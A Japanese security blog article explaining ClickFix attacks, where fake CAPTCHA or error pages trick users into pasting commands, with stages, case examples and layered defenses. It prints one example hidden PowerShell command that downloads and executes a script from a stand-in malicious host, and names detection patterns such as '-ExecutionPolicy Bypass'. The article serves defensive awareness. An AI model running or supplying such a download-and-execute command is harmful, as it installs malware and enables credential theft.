ClickFix攻撃が2025年に大流行している理由
皆さん、最近「ロボットではありません」の認証画面で変なコマンドを実行するよう指示された経験はありませんか?
現役のCSIRTアナリストとして数々のインシデント対応を行ってきた私から言わせると、2025年はClickFix攻撃の当たり年です。
この攻撃手法、実は2024年6月にProofpoint社が初めて報告したばかりの新しい脅威なんですが、その巧妙さたるや、正直言って背筋が寒くなるレベルです。
なぜClickFix攻撃がこんなに危険なのか
従来のサイバー攻撃と決定的に違うのは、被害者自身が攻撃者のお手伝いをしてしまうという点。
例えば、先日対応したある中小企業のケースでは、経理担当者が偽のBooking.com画面で「認証エラーを解決するため」と称してPowerShellコマンドを実行。その結果、会計システムにアクセスする認証情報が盗まれ、約200万円の不正送金被害が発生しました。
恐ろしいのは、この担当者が「正しいことをしている」と信じ込んでいたこと。通常のマルウェア感染なら「怪しいファイルを開いてしまった」という自覚があるものですが、ClickFixでは被害者に罪悪感すらないんです。
ClickFix攻撃の巧妙な手口を詳細分析
攻撃の流れ:5段階のトラップ
フォレンジック調査で見えてきたClickFix攻撃の典型的な流れは以下の通りです:
1. 初期誘導フェーズ
– 検索結果の操作やSNS広告
– 偽のシステム通知メール
– 侵害されたWebサイト経由
2. 偽インターフェース表示
– 「私はロボットではありません」の偽CAPTCHA
– Windows Defenderの偽セキュリティ通知
– ブラウザ更新を装ったエラーメッセージ
3. 心理的誘導
– 「緊急性」:「すぐに対応しないとアカウントが停止されます」
– 「権威性」:マイクロソフト等の有名企業を偽装
– 「社会的証明」:「多くのユーザーが同じ操作をしています」
4. コマンド実行誘導
– Win+Rキーでファイル名を指定して実行を開く
– 指定されたコマンドをコピー&ペースト
– 「認証完了までお待ちください」で違和感を排除
5. マルウェア感染・情報窃取
– バックグラウンドでマルウェアダウンロード
– ブラウザ保存の認証情報窃取
– 横展開による被害拡大
実際のコマンド例と被害パターン
フォレンジック調査で発見された実際のコマンド例を見てみましょう:
“`
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command “IEX (New-Object Net.WebClient).DownloadString(‘https://malicious-site.com/payload.ps1’)”
“`
このコマンド、一見すると意味不明な文字列ですが、実際は:
– PowerShellを隠れて実行
– セキュリティポリシーを回避
– 悪意のあるサイトからマルウェアをダウンロード・実行
という恐ろしい処理を行っています。
個人・企業別の被害事例と対策
個人への攻撃事例
最近話題になったのが、TikTokでの「通信料が安くなるコマンド」詐欺。AI生成動画で若者を騙し、スマートフォンの個人情報を盗むインフォスティーラーをインストールさせる手口です。
被害者の多くは10-20代で、以下のような被害が報告されています:
– SNSアカウントの乗っ取り
– オンラインバンキングの不正利用
– 家族・友人への二次被害拡散
個人でできる対策
– 見慣れないコマンド実行の指示は絶対に従わない
– 「Win+R」操作を求められたら立ち止まる
– アンチウイルスソフト
で怪しいサイトへのアクセスをブロック
– VPN
で通信を暗号化し、フィッシングサイト検出機能を活用
企業・組織への攻撃事例
ある製造業A社では、人事部門がLinkedInを装ったフィッシングメールからClickFix攻撃を受け、以下の被害が発生:
– 社員データベースへの不正アクセス
– 取引先への偽メール送信
– 生産管理システムへの横展開
被害総額は復旧費用含めて約1,500万円。特に問題だったのは、攻撃発覚まで3週間かかったこと。通常のマルウェア感染なら数日で検知できるはずですが、ClickFixは正規ツールを悪用するため検知が困難でした。
確実に効果がある対策方法
人的対策:3つの柱
1. 明確なルール設定
– ヘルプデスクはコマンドのコピペ指示を原則禁止
– ブラウザ・OSが直接コマンド入力を求めることはない
– 例外対応は必ずチケット番号で管理
2. 実践的な訓練プログラム
– 偽CAPTCHA画面を使った模擬演習
– 「5秒ルール」:長いコマンドを見たら5秒立ち止まる習慣化
– 業務文脈に近いシナリオでの訓練
3. 報告しやすい文化作り
– 「怪しいと思ったらまず報告」の徹底
– 誤報でも感謝する組織風土
– 簡単に報告できる仕組み(Slack、メール等)
技術的対策:多層防御の実装
PowerShell制限
– Constrained Language Mode(CLM)の適用
– AppLockerによる実行制限
– Script Block Loggingの有効化
Attack Surface Reduction
– 難読化スクリプトの実行制限
– Officeマクロによるプロセス起動抑制
– 「ファイル名を指定して実行」の制限
ログ監視・検知
– PowerShellコマンド実行ログの収集
– 「-ExecutionPolicy Bypass」等の不審パターン検知
– プロセス作成ログによる異常検知
Webサイト運営者の対策
自社サイトがClickFix攻撃の踏み台にされないよう、Webサイト脆弱性診断サービス
による定期的な脆弱性チェックが重要です。
特に以下の点を重点的にチェック:
– SQLインジェクション脆弱性
– XSS(クロスサイトスクリプティング)脆弱性
– 不正なJavaScriptの埋め込み
– リダイレクト機能の悪用可能性
2025年のClickFix攻撃動向と今後の対策
国家支援型グループの参入
2025年に入って特に注目すべきは、北朝鮮・イラン・ロシアといった国家支援型APTグループがClickFix手法を採用し始めていること。
これまでの金銭目的から、政治的・軍事的な情報窃取や破壊工作への応用が懸念されます。特に重要インフラや政府機関への攻撃では、より巧妙で持続的なClickFix攻撃が予想されます。
AI技術との融合
最近の傾向として、AI生成技術を悪用したより自然な偽インターフェースの作成が挙げられます。従来の機械翻訳的な違和感のあるメッセージから、ネイティブレベルの自然な文章による誘導が増加しています。
モバイル端末への拡大
これまでPC中心だったClickFix攻撃が、スマートフォンやタブレットにも拡大。特に若年層をターゲットにしたSNS経由の攻撃が急増しています。
まとめ:ClickFix攻撃から身を守るために
ClickFix攻撃の最大の特徴は、被害者自身が攻撃に加担してしまうという点です。
従来のセキュリティ対策だけでは防げないこの新しい脅威に対しては:
1. 人の判断力を鍛える:違和感を感じたら立ち止まる習慣
2. 技術的な手すり:万が一の時の被害軽減策
3. 組織文化の改革:報告しやすい環境作り
この3つの組み合わせが不可欠です。
個人の方はアンチウイルスソフト
とVPN
の併用で基本的な防御を、企業の方はWebサイト脆弱性診断サービス
による定期的な脆弱性チェックと社内教育の充実を強くお勧めします。
サイバー攻撃は日々進化していますが、基本的な対策と意識の向上で多くの被害は防げます。この記事を参考に、ぜひ今日から対策を始めてください。
